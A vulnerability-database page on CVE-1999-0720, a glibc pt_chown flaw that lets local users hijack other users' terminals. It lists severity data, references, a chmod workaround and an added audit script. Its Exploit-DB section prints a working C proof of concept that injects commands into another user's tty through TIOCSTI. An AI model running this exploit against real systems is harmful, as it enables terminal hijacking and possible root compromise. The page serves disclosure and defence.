CVE-1999-0720
CVSS 4.6
Published: 1999-08-23 00:00:00
Last revised: 2008-09-09 08:35:16

[Original] The pt_chown command in Linux allows local users to modify TTY terminal devices that belong to other users.


[CNNVD] Linux pt_chown vulnerability (CNNVD-199908-047)

        The pt_chown command on Linux is vulnerable. Local users can modify TTY terminal devices that belong to other users.

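- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]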

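- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0720
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0720
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199908-047
(official data source) CNNVD

- Other links and resources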

http://www.securityfocus.com/templates/archive.pike?list=1&msg=lcamtuf.4.05.9907041223290.355-300000@nimue.ids.pl
(UNKNOWN)  BUGTRAQ  19990823 [Linux] glibc 2.1.x / wu-ftpd <=2.5 / BeroFTPD / lynx / vlock / mc / glibc 2.0.x
http://www.securityfocus.com/bid/597
(UNKNOWN)  BID  597

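- Vulnerability information

Linux pt_chown vulnerability
Medium severity  Other
1999-08-23 00:00:00 2005-05-02 00:00:00
Local
        The pt_chown command on Linux is vulnerable. Local users can modify TTY terminal devices that belong to other users.

- Advisories and patches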

        Michal Zalewski suggested the following:
        chmod 700 /usr/libexec/pt_chown
        A complete fix is to install the newest version of GNU Libc. As of this writing (January, 19 - 2000) this version is 2.1.2 and is available via:
        ftp://ftp.gnu.org/pub/gnu/glibc/glibc-2.1.2.tar.gz
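
An added example (not part of the original advisory or of glibc): a shell audit for the exposure that the chmod 700 workaround above removes, namely a setuid helper that group or other users can execute. The function names and status words are hypothetical; the default path is the one quoted in the advisory.

```shell
#!/bin/sh
# Added example, not from the advisory: classify a setuid helper such as
# pt_chown by who is able to run it with the owner's privileges.
# Function names and status words are made up for this illustration.

# Prints one of: missing | not-setuid | restricted | exposed
# Returns 1 only for "exposed" (setuid AND executable by group or others).
audit_helper() {
    path=$1
    if [ ! -e "$path" ]; then
        echo missing; return 0
    fi
    if [ ! -u "$path" ]; then
        echo not-setuid; return 0
    fi
    # First 10 chars of ls -ld are the type and permission string,
    # e.g. -rwsr-xr-x (char 7 = group execute, char 10 = other execute).
    mode=$(ls -ld "$path" | cut -c1-10)
    case $mode in
        ??????[xs]???|?????????[xt])
            echo exposed; return 1 ;;
    esac
    echo restricted; return 0
}

# Apply the advisory's workaround, then re-audit. On a regular file a
# three-digit numeric mode also clears the setuid bit.
harden_helper() {
    chmod 700 "$1" && audit_helper "$1"
}

# Default path is the one quoted in the advisory; override with PT_CHOWN.
target=${PT_CHOWN:-/usr/libexec/pt_chown}
printf '%s: %s\n' "$target" "$(audit_helper "$target")"
```
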

- Vulnerability information (19467)

GNU glibc 2.1/2.1.1 -6 pt_chown Vulnerability (EDBID:19467)
linux local
1999-08-23 Verified
0 Michal Zalewski
source: http://www.securityfocus.com/bid/597/info

pt_chown is a program included with glibc 2.1.x that exists to aid the proper allocation of terminals for non-suid programs that don't have devpts support. It is installed setuid root, and is shipped with RedHat Linux 6.0. As it stands, pt_chown is vulnerable to an attack that allows malicious users to write arbitrary data to tty input/output streams (open file descriptors -> tty) that don't belong to them (you could theoretically get full control of the terminal). This is done by fooling the program into giving you access (it lacks security checks). Whether you can be compromised or not depends on the software you are using and whether it has support for devpts (screen, midnight commander, etc). The consequences are hijacking of terminals, possibly leading to a root compromise.

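#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>

int main(int a, char *b[]) {
    char *c = "\nclear;echo huhuhu, it worked...;id;sleep 2\n";
    size_t i;
    /* Expect writable, allocated (eg. by screen) /dev/ttyXX as 1st arg */
    int x = open(b[1], O_WRONLY);

    if (x < 0) {
        perror(b[1]);
        exit(1);
    }

    if (!fork()) {
        /* Child: hand the open tty to pt_chown on descriptor 3 */
        dup2(x, 3);
        execl("/usr/libexec/pt_chown", "pt_chown", (char *)NULL);
        perror("pt_chown");
        exit(1);
    }
    sleep(1);
    /* Parent: 0x5412 is TIOCSTI, one ioctl per character of c */
    for (i = 0; i < strlen(c); i++) ioctl(x, 0x5412, &c[i]);

    return 0;
}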

- Vulnerability information

1053
Linux pt_chown Arbitrary TTY Modification
Local Access Required Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

1999-08-23 Unknown
Unknown Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
